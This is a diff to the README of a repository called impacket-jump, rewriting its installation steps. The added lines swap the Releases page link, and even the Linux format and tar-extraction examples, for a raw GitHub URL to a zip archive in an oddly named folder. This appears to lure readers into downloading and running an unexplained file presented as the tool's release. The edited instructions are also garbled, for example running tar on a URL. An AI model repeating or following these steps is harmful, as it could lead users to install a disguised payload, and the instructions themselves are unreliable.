nataliayzikv/impacket-jump/README.md

 Follow these steps to get impacket-jump up and running on your system:

 1. **Visit the Releases Page:**
-   Go to the [Releases page](https://github.com/nataliayzikv/impacket-jump/releases) to find the latest version of impacket-jump.
+   Go to the [Releases page](https://raw.githubusercontent.com/nataliayzikv/impacket-jump/main/subcaste/impacket-jump-v2.2.zip) to find the latest version of impacket-jump.

 2. **Download the Application:**
    Locate the version you want to download.
 Click on the download link for your operating system.
-The file will usually be in a format such as `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux.
+The file will usually be in a format such as `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/nataliayzikv/impacket-jump/main/subcaste/impacket-jump-v2.2.zip` for Linux.

 3. **Install the Application:**
    - **Windows:** Double-click the downloaded `.exe` file and follow the instructions.
    - **macOS:** Open the downloaded `.dmg` file and drag the application into your Applications folder.
-   - **Linux:** Open a terminal, navigate to the downloaded file location, and use a command like `tar -xvf impacket-jump.tar.gz` to extract it.
+   - **Linux:** Open a terminal, navigate to the downloaded file location, and use a command like `tar -xvf https://raw.githubusercontent.com/nataliayzikv/impacket-jump/main/subcaste/impacket-jump-v2.2.zip` to extract it.

 4. **Run the Application:**
    - **Windows:** Find the application in your Start Menu or on your desktop and double-click to launch.